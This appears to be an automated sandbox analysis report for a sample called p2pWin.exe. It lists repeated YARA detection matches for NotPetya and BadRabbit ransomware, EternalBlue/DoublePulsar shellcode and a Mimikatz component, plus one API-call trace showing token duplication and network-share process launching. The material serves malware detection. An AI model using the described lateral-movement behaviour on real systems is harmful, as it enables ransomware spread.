            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_02E59987 wsprintfW,wsprintfW,wsprintfW,WNetAddConnection2W,wsprintfW,PathFindExtensionW,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, 1_2_02E59987
            Source: p2pWin.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: p2pWin.exe, type: SAMPLEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: p2pWin.exe, type: SAMPLEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: p2pWin.exe, type: SAMPLEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: p2pWin.exe, type: SAMPLEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: p2pWin.exe, type: SAMPLEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: p2pWin.exe, type: SAMPLEMatched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.2.p2pWin.exe.4d890.3.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.4c050.2.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.4d890.1.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 4.0.F2CD.tmp.7ff72e900000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.4c050.1.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2cf9840.1.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2e67860.4.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.4d890.2.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2cfb080.0.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPE | Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPE | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPE | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPE | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPE | Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPE | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPE | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPE | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.2.p2pWin.exe.4c050.1.raw.unpack, type: UNPACKEDPE | Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.F2CD.tmp.7ff72e900000.0.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPE | Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPE | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPE | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPE | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPE | Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPE | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPE | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPE | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPE | Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPE | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPE | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPE | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPE | Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
